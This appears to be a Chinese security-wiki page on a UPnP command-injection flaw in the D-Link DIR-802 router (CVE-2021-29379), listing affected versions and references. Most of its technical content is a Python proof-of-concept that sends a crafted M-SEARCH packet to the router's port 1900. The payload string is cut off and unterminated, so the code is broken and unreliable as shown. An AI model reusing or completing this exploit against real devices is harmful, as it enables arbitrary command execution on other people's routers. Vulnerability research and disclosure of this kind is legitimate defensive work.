menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right D-LINK DIR-802 命令注入漏洞(CVE-2021-29379).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    D-LINK DIR-802 命令注入漏洞(CVE-2021-29379).md
    659 B / 2021-05-21 09:14:38
        # D-LINK DIR-802 命令注入漏洞(CVE-2021-29379)


DIR-802中存在一个命令注入漏洞,攻击者可以通过精心制作的M-SEARCH数据包向UPnP注入任意命令。

受影响设备及软件版本

DIR-802 hardware revision Ax before v1.00b05

PoC:

```py
# coding: utf-8
import socket
import struct
buf = 'M-SEARCH * HTTP/1.1\r\nHOST:192.168.0.1:1900\r\nST:urn:schemas-upnp-org:service
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("192.168.0.1", 1900))
s.send(buf)
s.close()
```

ref:

* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29379
* https://cool-y.github.io/2021/03/02/DIR-802-OS-Command-Injection/
    links
    file_download